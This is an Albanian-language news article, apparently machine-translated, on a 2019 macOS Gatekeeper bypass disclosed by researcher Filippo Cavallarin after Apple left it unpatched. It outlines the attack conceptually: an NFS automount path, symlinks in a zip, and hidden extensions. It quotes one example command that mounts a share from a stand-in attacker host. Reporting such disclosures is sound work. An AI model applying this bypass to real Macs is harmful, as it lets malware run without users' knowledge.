Është e lehtë të instalosh një aplikacion keqdashës në një Mac. Apple nuk e ka rregulluar gabimin edhe pas tre muajsh

27. 5. 2019

Studiuesi i sigurisë Filippo Cavallarin postoi një paralajmërim në lidhje me defektin në macOS 10.14.5 në blogun e tij. Kjo konsiston në mundësinë e anashkalimit të plotë të masave të sigurisë së Portierit. Sipas Cavallarin, ai ia tregoi gabimin Apple tashmë në shkurt të këtij viti, por kompania nuk e rregulloi atë në përditësimin e fundit.

Gatekeeper u zhvillua nga Apple dhe u inkorporua në sistemin e saj operativ të desktopit për herë të parë në vitin 2012. Është një mekanizëm që parandalon ekzekutimin e një aplikacioni pa dijeninë dhe pëlqimin e përdoruesit. Pasi të shkarkoni një aplikacion, Gatekeeper kontrollon automatikisht kodin e tij për të parë nëse softueri është nënshkruar siç duhet nga Apple.

Në postimin e tij në blog, Cavallarin deklaron se Gatekeeper, si parazgjedhje, i konsideron si ruajtje të jashtme ashtu edhe ndarjet e rrjetit si vendndodhje të sigurta. Prandaj, çdo aplikacion që ndodhet në këto objektiva mund të lansohet automatikisht pa pasur nevojë të kalojë kontrollin Gatekeeper. Është kjo veçori që mund të shfrytëzohet për të nisur programe me qëllim të keq pa dijeninë e përdoruesit.

Një aspekt që lejon akses të paautorizuar është veçoria e montimit automatik, e cila i lejon përdoruesit të montojnë automatikisht një ndarje rrjeti thjesht duke specifikuar një shteg që fillon me "/net/". Si shembull, Cavallarin citon shtegun "ls /net/evil-attacker.com/sharedfolder/" i cili mund të shkaktojë që sistemi operativ të ngarkojë përmbajtjen e një dosjeje "sharefolder" në një vendndodhje të largët që mund të jetë potencialisht keqdashëse.

Mënyra se si funksionon kërcënimi mund ta shikoni në video:

Një faktor tjetër është fakti se nëse një arkiv zip që përmban një lidhje simbolike specifike që çon në funksionin e montimit automatik ndahet, ai nuk do të kontrollohet nga Gatekeeper. Në këtë mënyrë, viktima mund të shkarkojë me lehtësi arkivin me qëllim të keq dhe ta zbërthejë atë, duke i lejuar sulmuesit të ekzekutojë pothuajse çdo softuer në Mac pa dijeninë e përdoruesit. Finder, i cili fsheh shtesa të caktuara si parazgjedhje, ka gjithashtu pjesën e tij të kësaj dobësie.

Cavallarin deklaron në blogun e tij se Apple tërhoqi vëmendjen për dobësinë e sistemit operativ macOS më 22 shkurt të këtij viti. Por në mes të majit, Apple ndaloi komunikimin me Cavallarin, kështu që Cavallarin vendosi ta bënte të gjithën publike.

burimi: FCVL

Temat: magazinimit, automatikisht, MacOS, video, Cilësimet, funksionin, përdorues, Aplikacion, mollë

Diskutimi i artikullit

Emri yt

Komenti yt

Duke plotësuar të dhënat e mësipërme, pranoj se kompania TEXT FACTORY s.r.o., me seli në Brno, Durďákova 336/29, Černá Pole, kodi ZIP: 613 00, numri i ID: 06157831, regjistruar në Gjykatën Rajonale C. , futni 100399, do të përpunojë të dhënat e mia personale të dhëna në formularin e regjistrimit të plotësuar nga unë në bazë të interesave legjitime të TEXT FACTORY s.r.o. sipas nenit 6 paragrafi 1 shkronja f) GDPR dhe për të përmbushur detyrimet ligjore (neni 6, paragrafi 1, germa c) GDPR), për qëllimet e mëposhtme: nevojën për të siguruar autorizimin e vizitorëve në faqet e internetit të operuara nga TEXT FACTORY s.r.o., për të kontribuar aktivisht në artikujt e botuar ose brenda diskutimit forume dhe ushtrimi i të drejtave të TEXT FACTORY s.r.o si administrator i këtyre forumeve të diskutimit. Më shumë informacion rreth përpunimit të të dhënave personale dhe të drejtave mund të gjeni në Mësime për mbrojtjen e të dhënave personale. të gjithë tekstin

Mund te jete ju intereson

Të lidhura